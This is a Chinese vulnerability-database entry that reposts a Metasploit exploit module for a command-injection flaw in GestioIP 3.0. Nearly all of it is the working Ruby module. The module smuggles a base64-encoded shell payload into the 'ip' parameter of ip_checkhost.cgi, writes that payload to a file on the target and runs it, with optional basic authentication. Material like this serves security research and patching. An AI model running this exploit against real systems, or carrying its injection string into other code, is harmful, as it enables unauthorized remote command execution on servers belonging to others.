GestioIP Remote Command Execution

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044311 漏洞类型
发布时间 2013-10-08 更新时间 2013-10-08
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013100049
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'GestioIP Remote Command Execution',
      'Description'    => %q{
        This module exploits a command injection flaw to create a shell script
        on the filesystem and execute it. If GestioIP is configured to use no authentication,
        no password is required to exploit the vulnerability. Otherwise, an authenticated
        user is required to exploit.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'bperry'  #Initial Discovery and metasploit module
        ],
      'References'     =>
        [
          [ 'URL', 'http://sourceforge.net/p/gestioip/gestioip/ci/ac67be9fce5ee4c0438d27dfa5c1dcbca08c457c/' ], # Patch
          [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2461' ], # First disclosure
          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/03/gestioip-authenticated-remote-command-execution-module' ]
        ],
      'Payload'        =>
        {
          'Space'       => 475, # not a lot of room
          'DisableNops' => true,
          'BadChars'    => "",
        },
      'Platform'        => [ 'unix' ],
      'Arch'            => ARCH_CMD,
      'Targets'         => [[ 'Automatic GestioIP 3.0', { }]],
      'Privileged'      => false,
      'DisclosureDate'  => 'Oct 4 2013',
      'DefaultTarget'   => 0))

    register_options(
    [
      OptString.new('TARGETURI', [true, 'URI', '/gestioip/']),
      OptString.new('USERNAME', [false, 'The username to auth as', 'gipadmin']),
      OptString.new('PASSWORD', [false, 'The password to auth with', nil])
    ], self.class)
  end

  def user
    datastore['USERNAME']
  end

  def pass
    datastore['PASSWORD']
  end

  def use_auth
    !(pass.nil? or pass.empty?)
  end

  def exploit

    pay = Rex::Text.encode_base64(payload.encoded)
    file = Rex::Text.rand_text_alpha(8)

    options = {
      'uri' => normalize_uri(target_uri.path, "ip_checkhost.cgi"),
      'encode_params' => false,
      'vars_get' => {
          'ip' => "2607:f0d0:$(echo${IFS}" + pay + "|base64${IFS}--decode|tee${IFS}"+file+"&&sh${IFS}"+file+"):0000:0000:0000:0000:0004",
          'hostname' => "fds",
          'client_id' => "1",
          'ip_version' => ""
      }
    }

    if use_auth
      options.merge!('authorization' => basic_auth(user,pass))
    end

    res = send_request_cgi(options)

    if res and res.code == 401
      fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Please provide USERNAME and PASSOWRD")
    end

  end
end